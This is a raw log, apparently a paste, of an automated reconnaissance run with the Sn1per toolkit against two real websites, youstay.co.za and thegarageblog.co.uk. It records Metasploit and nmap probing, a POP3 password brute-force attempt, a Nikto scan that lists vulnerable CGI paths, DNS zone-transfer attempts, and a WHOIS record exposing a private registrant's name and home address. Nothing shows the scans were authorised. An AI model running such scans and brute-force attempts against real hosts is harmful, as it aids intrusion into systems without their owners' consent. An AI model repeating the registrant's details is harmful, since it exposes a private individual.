  1257. 0 results.
  1258.  
  1259. 34 queries in 10 seconds (3.4 queries / sec)
  1260.  
  1261.  
  1262. ______________________________________________________________________________
  1263. | |
  1264. | METASPLOIT CYBER MISSILE COMMAND V4 |
  1265. |______________________________________________________________________________|
  1266. \ / /
  1267. \ . / / x
  1268. \ / /
  1269. \ / + /
  1270. \ + / /
  1271. * / /
  1272. / . /
  1273. X / / X
  1274. / ###
  1275. / # % #
  1276. / ###
  1277. . /
  1278. . / . * .
  1279. /
  1280. *
  1281. + *
  1282.  
  1283. ^
  1284. #### __ __ __ ####### __ __ __ ####
  1285. #### / \ / \ / \ ########### / \ / \ / \ ####
  1286. ################################################################################
  1287. ################################################################################
  1288. # WAVE 4 ######## SCORE 31337 ################################## HIGH FFFFFFFF #
  1289. ################################################################################
  1290. http://metasploit.pro
  1291.  
  1292.  
  1293. Taking notes in notepad? Have Metasploit Pro track & report
  1294. your progress and findings -- learn more on http://rapid7.com/metasploit
  1295.  
  1296. =[ metasploit v4.12.7-dev ]
  1297. + -- --=[ 1551 exploits - 898 auxiliary - 267 post ]
  1298. + -- --=[ 438 payloads - 38 encoders - 8 nops ]
  1299. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
  1300.  
  1301. RHOSTS => youstay.co.za
  1302. RHOST => youstay.co.za
  1303. [*] 50.87.144.166:25 - 50.87.144.166:25 Banner: 220-gator3130.hostgator.com ESMTP Exim 4.86_1 #1 Sun, 10 Jul 2016 16:50:50 -0500
  1304. 220-We do not authorize the use of this system to transport unsolicited,
  1305. 220 and/or bulk e-mail.
  1306. [*] 50.87.144.166:25 - 50.87.144.166:25 could not be enumerated (no EXPN, no VRFY, invalid RCPT)
  1307. [*] youstay.co.za:25 - Scanned 1 of 1 hosts (100% complete)
  1308. [*] Auxiliary module execution completed
  1309. + -- --=[Port 53 closed... skipping.
  1310. + -- --=[Port 79 closed... skipping.
  1311. + -- --=[Port 80 opened... running tests...
  1312. ################################### Checking for WAF ##############################
  1313.  
  1314. ^ ^
  1315. _ __ _ ____ _ __ _ _ ____
  1316. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  1317. | V V // o // _/ | V V // 0 // 0 // _/
  1318. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
  1319. <
  1320. ...'
  1321.  
  1322. WAFW00F - Web Application Firewall Detection Tool
  1323.  
  1324. By Sandro Gauci && Wendel G. Henrique
  1325.  
  1326. Checking http://youstay.co.za
  1327. The site http://youstay.co.za is behind a ModSecurity (OWASP CRS)
  1328. Number of requests: 12
  1329.  
  1330. ################################### Gathering HTTP Info ###########################
  1331. ./whatweb: /usr/lib/ruby/vendor_ruby/rchardet/universaldetector.rb:39: invalid multibyte escape: /[\x80-\xFF]/ (SyntaxError)
  1332.  
  1333. __ ______ _____
  1334. \ \/ / ___|_ _|
  1335. \ /\___ \ | |
  1336. / \ ___) || |
  1337. /_/\_|____/ |_|
  1338.  
  1339. + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
  1340. + -- --=[Target: youstay.co.za:80
  1341. + -- --=[Site not vulnerable to Cross-Site Tracing!
  1342. + -- --=[Site not vulnerable to Host Header Injection!
  1343. + -- --=[Site vulnerable to Cross-Frame Scripting!
  1344. + -- --=[Site vulnerable to Clickjacking!
  1345.  
  1346. HTTP/1.1 405 Not Allowed
  1347. Server: nginx/1.10.1
  1348. Date: Sun, 10 Jul 2016 21:51:03 GMT
  1349. Content-Type: text/html
  1350. Content-Length: 173
  1351. Connection: close
  1352.  
  1353. <html>
  1354. <head><title>405 Not Allowed</title></head>
  1355. <body bgcolor="white">
  1356. <center><h1>405 Not Allowed</h1></center>
  1357. <hr><center>nginx/1.10.1</center>
  1358. </body>
  1359. </html>
  1360.  
  1361. HTTP/1.1 302 Moved Temporarily
  1362. Server: nginx/1.10.1
  1363. Date: Sun, 10 Jul 2016 21:51:05 GMT
  1364. Content-Type: text/html
  1365. Content-Length: 0
  1366. Connection: keep-alive
  1367. Location: /404.html
  1368.  
  1369.  
  1370.  
  1371.  
  1372.  
  1373. ################################### Checking HTTP Headers #########################
  1374. + -- --=[Checking if X-Content options are enabled on youstay.co.za...
  1375.  
  1376. + -- --=[Checking if X-Frame options are enabled on youstay.co.za...
  1377.  
  1378. + -- --=[Checking if X-XSS-Protection header is enabled on youstay.co.za...
  1379.  
  1380. + -- --=[Checking HTTP methods on youstay.co.za...
  1381.  
  1382. + -- --=[Checking if TRACE method is enabled on youstay.co.za...
  1383.  
  1384. + -- --=[Checking for open proxy on youstay.co.za...
  1385. <head>
  1386. <meta name="robots" content="noarchive" />
  1387. <meta name="googlebot" content="nosnippet" />
  1388. </head>
  1389. <body>
  1390. <div align=center>
  1391. <h3>Error. Page cannot be displayed. Please contact your service provider for more details. (26)</h3>
  1392. </div>
  1393. </body>
  1394. </html>
  1395. + -- --=[Enumerating software on youstay.co.za...
  1396. Server: nginx/1.10.1
  1397.  
  1398. + -- --=[Checking if Strict-Transport-Security is enabled on youstay.co.za...
  1399.  
  1400. + -- --=[Checking for Flash cross-domain policy on youstay.co.za...
  1401.  
  1402. + -- --=[Checking for Silverlight cross-domain policy on youstay.co.za...
  1403.  
  1404. + -- --=[Checking for HTML5 cross-origin resource sharing on youstay.co.za...
  1405.  
  1406. + -- --=[Retrieving robots.txt on youstay.co.za...
  1407. User-agent: *
  1408. Disallow: /
  1409.  
  1410. + -- --=[Retrieving sitemap.xml on youstay.co.za...
  1411.  
  1412. + -- --=[Checking cookie attributes on youstay.co.za...
  1413.  
  1414. + -- --=[Checking for ASP.NET Detailed Errors on youstay.co.za...
  1415. <div id="errorcode">ERROR 404 - PAGE NOT FOUND</div>
  1416. <p>You may get a 404 error for images because you have Hot Link Protection turned on and the domain is not on the list of authorized domains.</p>
  1417. <p>If you go to your temporary url (http://ip/~username/) and get this error, there maybe a problem with the rule set stored in an .htaccess file. You can try renaming that file to .htaccess-backup and refreshing the site to see if that resolves the issue.</p>
  1418. <p>Are you using WordPress? See the Section on 404 errors after clicking a link in WordPress.</p>
  1419. <p>When you get a 404 error be sure to check the URL that you are attempting to use in your browser.This tells the server what resource it should attempt to request.</p>
  1420. <h3><a class="expander" href=#>404 Errors After Clicking WordPress Links</a></h3>
  1421. <p>When working with WordPress, 404 Page Not Found errors can often occur when a new theme has been activated or when the rewrite rules in the .htaccess file have been altered.</p>
  1422. <p>When you encounter a 404 error in WordPress, you have two options for correcting it.</p>
  1423. <li>Test your website to make sure your changes were successfully saved. If not, correct the error or revert back to the previous version until your site works again.</li>
  1424. <h3><a href="https://support.hostgator.com/articles/cpanel/custom-error-pages">Want to customize this page?</a></h3>
  1425.  
  1426.  
  1427. ################################### Running Web Vulnerability Scan ################
  1428. - Nikto v2.1.6
  1429. ---------------------------------------------------------------------------
  1430. + Target IP: 50.87.144.166
  1431. + Target Hostname: youstay.co.za
  1432. + Target Port: 80
  1433. + Start Time: 2016-07-11 00:51:17 (GMT3)
  1434. ---------------------------------------------------------------------------
  1435. + Server: nginx/1.10.1
  1436. + The anti-clickjacking X-Frame-Options header is not present.
  1437. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
  1438. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
  1439. + Root page / redirects to: /404.html
  1440. + /cgi-sys/formmail.cgi: The remote CGI reveals its version number, which may aid attackers in finding vulnerabilities in the script.
  1441. + /cgi-sys/formmail.pl: Many versions of FormMail have remote vulnerabilities, including file access, information disclosure and email abuse. FormMail access should be restricted as much as possible or a more secure solution found.
  1442. + /cgi-sys/Count.cgi: This may allow attackers to execute arbitrary commands on the server
  1443. + OSVDB-3233: /mailman/listinfo: Mailman was found on the server.
  1444. + OSVDB-3092: /cgi-sys/entropysearch.cgi?query=asdfasdf&user=root&basehref=%2F%2Fwww.yourdomain.com/: CPanel's Entropy Search allows username enumeration via the user parameter.
  1445. + OSVDB-3092: /cgi-sys/FormMail-clone.cgi: Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web
  1446. + OSVDB-3092: /cgi-sys/scgiwrap: Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web
  1447. + OSVDB-3092: /img-sys/: Default image directory should not allow directory listing.
  1448. + OSVDB-3092: /java-sys/: Default Java directory should not allow directory listing.
  1449. + Server leaks inodes via ETags, header found with file /cgi-bin/c99.php, fields: 0x56a90723 0x16e2
  1450. + 9121 requests: 0 error(s) and 13 item(s) reported on remote host
  1451. + End Time: 2016-07-11 01:32:33 (GMT3) (2476 seconds)
  1452. ---------------------------------------------------------------------------
  1453. + 1 host(s) tested
  1454. ################################### Saving Web Screenshots ########################
  1455. [+] Screenshot saved to /root/Sn1per/loot/youstay.co.za-port80.jpg
  1456.  
  1457. (cutycapt:13008): Gtk-WARNING **: Theme directory devices/scalable of theme maia has no size field
  1458.  
  1459. openjdk version "1.8.0_91"
  1460. OpenJDK Runtime Environment (build 1.8.0_91-8u91-b14-3-b14)
  1461. OpenJDK 64-Bit Server VM (build 25.91-b14, mixed mode)
  1462. ################################### Running Google Hacking Queries #############
  1463. ################################### Running InUrlBR OSINT Queries ##############
  1464.  
  1465. _____ .701F. .iBR. .7CL. .70BR. .7BR. .7BR'''Cq. .70BR. .1BR'''Yp, .8BR'''Cq.
  1466. (_____) 01 01N. C 01 C 01 .01. 01 01 Yb 01 .01.
  1467. (() ()) 01 C YCb C 01 C 01 ,C9 01 01 dP 01 ,C9
  1468. \ / 01 C .CN. C 01 C 0101dC9 01 01'''bg. 0101dC9
  1469. \ / 01 C .01.C 01 C 01 YC. 01 , 01 .Y 01 YC.
  1470. /=\ 01 C Y01 YC. ,C 01 .Cb. 01 ,C 01 ,9 01 .Cb.
  1471. [___] .J01L. .JCL. YC .b0101d'. .J01L. .J01. .J01010101C .J0101Cd9 .J01L. .J01./ 2.1
  1472.  
  1473. __[ ! ] Neither war between hackers, nor peace for the system.
  1474. __[ ! ] http://blog.inurl.com.br
  1475. __[ ! ] http://fb.com/InurlBrasil
  1476. __[ ! ] http://twitter.com/@googleinurl
  1477. __[ ! ] http://github.com/googleinurl
  1478. __[ ! ] Current PHP version::[ 5.6.22-2 ]
  1479. __[ ! ] Current script owner::[ root ]
  1480. __[ ! ] Current uname::[ Linux anonymous 4.6.0-parrot-amd64 #1 SMP Parrot 4.6.2-2parrot0 (2016-06-29) x86_64 ]
  1481. __[ ! ] Current pwd::[ /root/Sn1per ]
  1482. __[ ! ] Help: php inurlbr.php --help
  1483. ------------------------------------------------------------------------------------------------------------------------
  1484.  
  1485. [ ! ] Starting SCANNER INURLBR 2.1 at [11-07-2016 01:32:49]
  1486. [ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
  1487. It is the end user's responsibility to obey all applicable local, state and federal laws.
  1488. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  1489.  
  1490. [ INFO ][ OUTPUT FILE ]:: [ /root/Sn1per/output/loot/inurlbr-youstay.co.za.txt ]
  1491. [ INFO ][ DORK ]::[ site:youstay.co.za ]
  1492. [ INFO ][ SEARCHING ]:: {
  1493. [ INFO ][ ENGINE ]::[ GOOGLE - www.google.com.gh ]
  1494.  
  1495. [ INFO ][ SEARCHING ]::
  1496. -[:::]
  1497. [ INFO ][ ENGINE ]::[ GOOGLE API ]
  1498.  
  1499. [ INFO ][ SEARCHING ]::
  1500. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
  1501. [ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.com.ly ID: 002901626849897788481:cpnctza84gq ]
  1502.  
  1503. [ INFO ][ SEARCHING ]::
  1504. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
  1505.  
  1506. [ INFO ][ TOTAL FOUND VALUES ]:: [ 0 ]
  1507. [ INFO ] Not a satisfactory result was found!
  1508.  
  1509.  
  1510. [ INFO ] [ Shutting down ]
  1511. [ INFO ] [ End of process INURLBR at [11-07-2016 01:33:08]
  1512. [ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
  1513. [ INFO ] [ OUTPUT FILE ]:: [ /root/Sn1per/output/loot/inurlbr-youstay.co.za.txt ]
  1514. |_________________________________________________________________________________________
  1515.  
  1516. \_________________________________________________________________________________________/
  1517.  
  1518. + -- --=[Port 110 opened... running tests...
  1519.  
  1520. Starting Nmap 7.12SVN ( https://nmap.org ) at 2016-07-11 01:33 EEST
  1521. Nmap scan report for youstay.co.za (50.87.144.166)
  1522. Host is up (0.22s latency).
  1523. rDNS record for 50.87.144.166: gator3130.hostgator.com
  1524. PORT STATE SERVICE VERSION
  1525. 110/tcp open pop3 Dovecot pop3d
  1526. | pop3-brute:
  1527. | Accounts: No valid accounts found
  1528. |_ Statistics: Performed 120 guesses in 183 seconds, average tps: 0
  1529. |_pop3-capabilities: UIDL PIPELINING SASL(PLAIN LOGIN) USER TOP AUTH-RESP-CODE RESP-CODES CAPA STLS
  1530.  
  1531. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  1532. Nmap done: 1 IP address (1 host up) scanned in 185.26 seconds
  1533. + -- --=[Port 111 closed... skipping.
  1534. + -- --=[Port 135 closed... skipping.
  1535. + -- --=[Port 139 closed... skipping.
  1536. + -- --=[Port 162 closed... skipping.
  1537. + -- --=[Port 389 closed... skipping.
  1538. + -- --=[Port 443 opened... running tests...
  1539. ################################### Checking for WAF ##############################
  1540.  
  1541. ^ ^
  1542. _ __ _ ____ _ __ _ _ ____
  1543. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  1544. | V V // o // _/ | V V // 0 // 0 // _/
  1545. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
  1546. <
  1547. ...'
  1548.  
  1549. WAFW00F - Web Application Firewall Detection Tool
  1550.  
  1551. By Sandro Gauci && Wendel G. Henrique
  1552.  
  1553. Checking https://youstay.co.za
  1554. The site https://youstay.co.za is behind a ModSecurity (OWASP CRS)
  1555. Number of requests: 11
  1556.  
  1557. ################################### Gathering HTTP Info ###########################
  1558. ./whatweb: /usr/lib/ruby/vendor_ruby/rchardet/universaldetector.rb:39: invalid multibyte escape: /[\x80-\xFF]/ (SyntaxError)
  1559.  
  1560. ################################### Gathering SSL/TLS Info ########################
  1561. Version: 1.11.7-static
  1562. OpenSSL 1.0.2i-dev xx XXX xxxx
  1563.  
  1564. Testing SSL server youstay.co.za on port 443
  1565.  
  1566. TLS Fallback SCSV:
  1567. Server supports TLS Fallback SCSV
  1568.  
  1569. TLS renegotiation:
  1570. Secure session renegotiation supported
  1571.  
  1572. TLS Compression:
  1573. Compression disabled
  1574.  
  1575. Heartbleed:
  1576. TLS 1.2 not vulnerable to heartbleed
  1577. TLS 1.1 not vulnerable to heartbleed
  1578. TLS 1.0 not vulnerable to heartbleed
  1579.  
  1580. Supported Server Cipher(s):
  1581. Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
  1582. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
  1583. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
  1584. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
  1585. Accepted TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 2048 bits
  1586. Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 2048 bits
  1587. Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 2048 bits
  1588. Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 2048 bits
  1589. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  1590. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  1591. Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
  1592. Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
  1593. Preferred TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  1594. Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  1595. Accepted TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
  1596. Accepted TLSv1.1 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
  1597. Preferred TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  1598. Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  1599. Accepted TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
  1600. Accepted TLSv1.0 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
  1601.  
  1602. SSL Certificate:
  1603. Signature Algorithm: sha256WithRSAEncryption
  1604. RSA Key Strength: 2048
  1605.  
  1606. Subject: *.hostgator.com
  1607. Altnames: DNS:*.hostgator.com, DNS:hostgator.com
  1608. Issuer: COMODO RSA Domain Validation Secure Server CA
  1609.  
  1610. Not valid before: Oct 16 00:00:00 2015 GMT
  1611. Not valid after: Oct 15 23:59:59 2018 GMT
  1612.  
  1613.  
  1614.  
  1615. AVAILABLE PLUGINS
  1616. -----------------
  1617.  
  1618. PluginCertInfo
  1619. PluginOpenSSLCipherSuites
  1620. PluginChromeSha1Deprecation
  1621. PluginHSTS
  1622. PluginSessionResumption
  1623. PluginHeartbleed
  1624. PluginCompression
  1625. PluginSessionRenegotiation
  1626.  
  1627.  
  1628.  
  1629. CHECKING HOST(S) AVAILABILITY
  1630. -----------------------------
  1631.  
  1632. youstay.co.za:443 => 50.87.144.166:443
  1633.  
  1634.  
  1635.  
  1636. SCAN RESULTS FOR YOUSTAY.CO.ZA:443 - 50.87.144.166:443
  1637. ------------------------------------------------------
  1638.  
  1639. * Deflate Compression:
  1640. OK - Compression disabled
  1641.  
  1642. * Session Renegotiation:
  1643. Client-initiated Renegotiations: OK - Rejected
  1644. Secure Renegotiation: OK - Supported
  1645.  
  1646. * Certificate - Content:
  1647. SHA1 Fingerprint: 9141b50cee603888dc45f4f285c1c8844fe12221
  1648. Common Name: *.hostgator.com
  1649. Issuer: COMODO RSA Domain Validation Secure Server CA
  1650. Serial Number: 19607DA086E8A7FE72900982CFED93BF
  1651. Not Before: Oct 16 00:00:00 2015 GMT
  1652. Not After: Oct 15 23:59:59 2018 GMT
  1653. Signature Algorithm: sha256WithRSAEncryption
  1654. Public Key Algorithm: rsaEncryption
  1655. Key Size: 2048 bit
  1656. Exponent: 65537 (0x10001)
  1657. X509v3 Subject Alternative Name: {'DNS': ['*.hostgator.com', 'hostgator.com']}
  1658.  
  1659. * Certificate - Trust:
  1660. Hostname Validation: FAILED - Certificate does NOT match youstay.co.za
  1661. Google CA Store (09/2015): OK - Certificate is trusted
  1662. Java 6 CA Store (Update 65): OK - Certificate is trusted
  1663. Microsoft CA Store (09/2015): OK - Certificate is trusted
  1664. Mozilla NSS CA Store (09/2015): OK - Certificate is trusted
  1665. Apple CA Store (OS X 10.10.5): OK - Certificate is trusted
  1666. Certificate Chain Received: ['*.hostgator.com', 'COMODO RSA Domain Validation Secure Server CA', 'COMODO RSA Certification Authority']
  1667.  
  1668. * Certificate - OCSP Stapling:
  1669. NOT SUPPORTED - Server did not send back an OCSP response.
  1670.  
  1671. * Session Resumption:
  1672. With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
  1673. With TLS Session Tickets: OK - Supported
  1674.  
  1675. * SSLV2 Cipher Suites:
  1676. Server rejected all cipher suites.
  1677.  
  1678. * SSLV3 Cipher Suites:
  1679. Undefined - An unexpected error happened:
  1680. SRP-RSA-3DES-EDE-CBC-SHA error - [Errno 111] Connection refused
  1681. PSK-3DES-EDE-CBC-SHA error - [Errno 111] Connection refused
  1682. NULL-SHA256 error - [Errno 111] Connection refused
  1683. NULL-SHA error - [Errno 111] Connection refused
  1684. NULL-MD5 error - [Errno 111] Connection refused
  1685. EXP-RC4-MD5 error - [Errno 111] Connection refused
  1686. EXP-RC2-CBC-MD5 error - [Errno 111] Connection refused
  1687. EXP-EDH-RSA-DES-CBC-SHA error - [Errno 111] Connection refused
  1688. EXP-EDH-DSS-DES-CBC-SHA error - [Errno 111] Connection refused
  1689. EXP-DES-CBC-SHA error - [Errno 111] Connection refused
  1690. EXP-ADH-RC4-MD5 error - [Errno 111] Connection refused
  1691. EXP-ADH-DES-CBC-SHA error - [Errno 111] Connection refused
  1692. EDH-RSA-DES-CBC-SHA error - [Errno 111] Connection refused
  1693. EDH-DSS-DES-CBC3-SHA error - [Errno 111] Connection refused
  1694. EDH-DSS-DES-CBC-SHA error - [Errno 111] Connection refused
  1695. ECDHE-RSA-NULL-SHA error - [Errno 111] Connection refused
  1696. ECDHE-ECDSA-NULL-SHA error - [Errno 111] Connection refused
  1697. ECDH-RSA-NULL-SHA error - [Errno 111] Connection refused
  1698. ECDH-RSA-DES-CBC3-SHA error - [Errno 111] Connection refused
  1699. ECDH-ECDSA-NULL-SHA error - [Errno 111] Connection refused
  1700. ECDH-ECDSA-DES-CBC3-SHA error - [Errno 111] Connection refused
  1701. DH-RSA-DES-CBC3-SHA error - [Errno 111] Connection refused
  1702. DH-RSA-DES-CBC-SHA error - [Errno 111] Connection refused
  1703. DH-DSS-DES-CBC3-SHA error - [Errno 111] Connection refused
  1704. DH-DSS-DES-CBC-SHA error - [Errno 111] Connection refused
  1705. DES-CBC3-SHA error - [Errno 111] Connection refused
  1706. DES-CBC-SHA error - [Errno 111] Connection refused
  1707. AECDH-NULL-SHA error - [Errno 111] Connection refused
  1708. AECDH-DES-CBC3-SHA error - [Errno 111] Connection refused
  1709. ADH-DES-CBC3-SHA error - [Errno 111] Connection refused
  1710. ADH-DES-CBC-SHA error - [Errno 111] Connection refused
  1711.  
  1712.  
  1713.  
  1714. SCAN COMPLETED IN 17.22 S
  1715. -------------------------
  1716.  
  1717. **Target: thegarageblog.co.uk **
  1718.  
  1719. _________ / _/___ ___ _____
  1720. / ___/ __ \ / // __ \/ _ \/ ___/
  1721. (__ ) / / // // /_/ / __/ /
  1722. /____/_/ /_/___/ .___/\___/_/
  1723. /_/
  1724.  
  1725. + -- --=[http://crowdshield.com
  1726. + -- --=[sn1per v1.7 by 1N3
  1727.  
  1728. ################################### Running recon #################################
  1729. ../../../../lib/isc/unix/net.c:581: sendmsg() failed: Operation not permitted
  1730. Server: 8.8.8.8
  1731. Address: 8.8.8.8#53
  1732.  
  1733. Non-authoritative answer:
  1734. Name: thegarageblog.co.uk
  1735. Address: 192.254.237.91
  1736.  
  1737. ../../../../lib/isc/unix/net.c:581: sendmsg() failed: Operation not permitted
  1738. thegarageblog.co.uk has address 192.254.237.91
  1739. thegarageblog.co.uk mail is handled by 0 thegarageblog.co.uk.
  1740.  
  1741. Xprobe2 v.0.3 Copyright (c) 2002-2005 [email protected], [email protected], [email protected]
  1742.  
  1743. [+] Target is thegarageblog.co.uk
  1744. [+] Loading modules.
  1745. [+] Following modules are loaded:
  1746. [x] [1] ping:icmp_ping - ICMP echo discovery module
  1747. [x] [2] ping:tcp_ping - TCP-based ping discovery module
  1748. [x] [3] ping:udp_ping - UDP-based ping discovery module
  1749. [x] [4] infogather:ttl_calc - TCP and UDP based TTL distance calculation
  1750. [x] [5] infogather:portscan - TCP and UDP PortScanner
  1751. [x] [6] fingerprint:icmp_echo - ICMP Echo request fingerprinting module
  1752. [x] [7] fingerprint:icmp_tstamp - ICMP Timestamp request fingerprinting module
  1753. [x] [8] fingerprint:icmp_amask - ICMP Address mask request fingerprinting module
  1754. [x] [9] fingerprint:icmp_port_unreach - ICMP port unreachable fingerprinting module
  1755. [x] [10] fingerprint:tcp_hshake - TCP Handshake fingerprinting module
  1756. [x] [11] fingerprint:tcp_rst - TCP RST fingerprinting module
  1757. [x] [12] fingerprint:smb - SMB fingerprinting module
  1758. [x] [13] fingerprint:snmp - SNMPv2c fingerprinting module
  1759. [+] 13 modules registered
  1760. [+] Initializing scan engine
  1761. [+] Running scan engine
  1762. [-] ping:tcp_ping module: no closed/open TCP ports known on 192.254.237.91. Module test failed
  1763. [-] ping:udp_ping module: no closed/open UDP ports known on 192.254.237.91. Module test failed
  1764. [-] No distance calculation. 192.254.237.91 appears to be dead or no ports known
  1765. [+] Host: 192.254.237.91 is up (Guess probability: 50%)
  1766. [+] Target: 192.254.237.91 is alive. Round-Trip Time: 0.22288 sec
  1767. [+] Selected safe Round-Trip Time value is: 0.44577 sec
  1768. [-] fingerprint:tcp_hshake Module execution aborted (no open TCP ports known)
  1769. [-] fingerprint:smb need either TCP port 139 or 445 to run
  1770. [-] fingerprint:snmp: need UDP port 161 open
  1771. [+] Primary guess:
  1772. [+] Host 192.254.237.91 Running OS: `��%=V (Guess probability: 96%)
  1773. [+] Other guesses:
  1774. [+] Host 192.254.237.91 Running OS: `��%=V (Guess probability: 96%)
  1775. [+] Host 192.254.237.91 Running OS: `��%=V (Guess probability: 96%)
  1776. [+] Host 192.254.237.91 Running OS: `��%=V (Guess probability: 96%)
  1777. [+] Host 192.254.237.91 Running OS: `��%=V (Guess probability: 96%)
  1778. [+] Host 192.254.237.91 Running OS: `��%=V (Guess probability: 96%)
  1779. [+] Host 192.254.237.91 Running OS: `��%=V (Guess probability: 96%)
  1780. [+] Host 192.254.237.91 Running OS: `��%=V (Guess probability: 96%)
  1781. [+] Host 192.254.237.91 Running OS: `��%=V (Guess probability: 96%)
  1782. [+] Host 192.254.237.91 Running OS: `��%=V (Guess probability: 96%)
  1783. [+] Cleaning up scan engine
  1784. [+] Modules deinitialized
  1785. [+] Execution completed.
  1786. ../../../../lib/isc/unix/net.c:581: sendmsg() failed: Operation not permitted
  1787.  
  1788. ; <<>> DiG 9.10.3-P4-Debian <<>> -x thegarageblog.co.uk
  1789. ;; global options: +cmd
  1790. ;; Got answer:
  1791. ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 21865
  1792. ;; flags: qr rd ra ad; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
  1793.  
  1794. ;; OPT PSEUDOSECTION:
  1795. ; EDNS: version: 0, flags:; udp: 4096
  1796. ;; QUESTION SECTION:
  1797. ;uk.co.thegarageblog.in-addr.arpa. IN PTR
  1798.  
  1799. ;; AUTHORITY SECTION:
  1800. in-addr.arpa. 3600 IN SOA b.in-addr-servers.arpa. nstld.iana.org. 2015073991 1800 900 604800 3600
  1801.  
  1802. ;; Query time: 256 msec
  1803. ;; SERVER: 8.8.8.8#53(8.8.8.8)
  1804. ;; WHEN: Mon Jul 11 10:15:20 EEST 2016
  1805. ;; MSG SIZE rcvd: 129
  1806.  
  1807.  
  1808. Domain name:
  1809. thegarageblog.co.uk
  1810.  
  1811. Registrant:
  1812. David Goodman
  1813.  
  1814. Registrant type:
  1815. Unknown
  1816.  
  1817. Registrant's address:
  1818. 17 Blackwater Way
  1819. ALDERSHOT
  1820. Hampshire
  1821. GU12 4DN
  1822. United Kingdom
  1823.  
  1824. Data validation:
  1825. Nominet was able to match the registrant's name and address against a 3rd party data source on 10-Dec-2012
  1826.  
  1827. Registrar:
  1828. Namesco Limited [Tag = NAMESCO]
  1829. URL: http://www.names.co.uk
  1830.  
  1831. Relevant dates:
  1832. Registered on: 21-Aug-2008
  1833. Expiry date: 21-Aug-2016
  1834. Last updated: 07-Jan-2014
  1835.  
  1836. Registration status:
  1837. Registered until expiry date.
  1838.  
  1839. Name servers:
  1840. ns1103.hostgator.com
  1841. ns1104.hostgator.com
  1842.  
  1843. WHOIS lookup made at 08:15:21 11-Jul-2016
  1844.  
  1845. --
  1846. This WHOIS information is provided for free by Nominet UK the central registry
  1847. for .uk domain names. This information and the .uk WHOIS are:
  1848.  
  1849. Copyright Nominet UK 1996 - 2016.
  1850.  
  1851. You may not access the .uk WHOIS or use any data from it except as permitted
  1852. by the terms of use available in full at http://www.nominet.uk/whoisterms,
  1853. which includes restrictions on: (A) use of the data for advertising, or its
  1854. repackaging, recompilation, redistribution or reuse (B) obscuring, removing
  1855. or hiding any or all of this notice and (C) exceeding query rate or volume
  1856. limits. The data is provided on an 'as-is' basis and may lag behind the
  1857. register. Access may be withdrawn or restricted at any time.
  1858. Smartmatch is experimental at ./dnsenum.pl line 698.
  1859. Smartmatch is experimental at ./dnsenum.pl line 698.
  1860. dnsenum.pl VERSION:1.2.4
  1861.  
  1862. ----- thegarageblog.co.uk -----
  1863.  
  1864.  
  1865. Host's addresses:
  1866. __________________
  1867.  
  1868. thegarageblog.co.uk. 14394 IN A 192.254.237.91
  1869.  
  1870.  
  1871. Name Servers:
  1872. ______________
  1873.  
  1874. ns1104.hostgator.com. 43193 IN A 192.254.186.42
  1875. ns1103.hostgator.com. 43193 IN A 192.254.190.45
  1876.  
  1877.  
  1878. Mail (MX) Servers:
  1879. ___________________
  1880.  
  1881. thegarageblog.co.uk. 14393 IN A 192.254.237.91
  1882.  
  1883.  
  1884. Trying Zone Transfers and getting Bind Versions:
  1885. _________________________________________________
  1886.  
  1887.  
  1888. Trying Zone Transfer for thegarageblog.co.uk on ns1104.hostgator.com ...
  1889. AXFR record query failed: REFUSED
  1890.  
  1891. Trying Zone Transfer for thegarageblog.co.uk on ns1103.hostgator.com ...
  1892. AXFR record query failed: REFUSED
  1893.  
  1894. brute force file not specified, bay.
  1895.  
  1896. ____ _ _ _ _ _____
  1897. / ___| _ _| |__ | (_)___| |_|___ / _ __
  1898. \___ \| | | | '_ \| | / __| __| |_ \| '__|
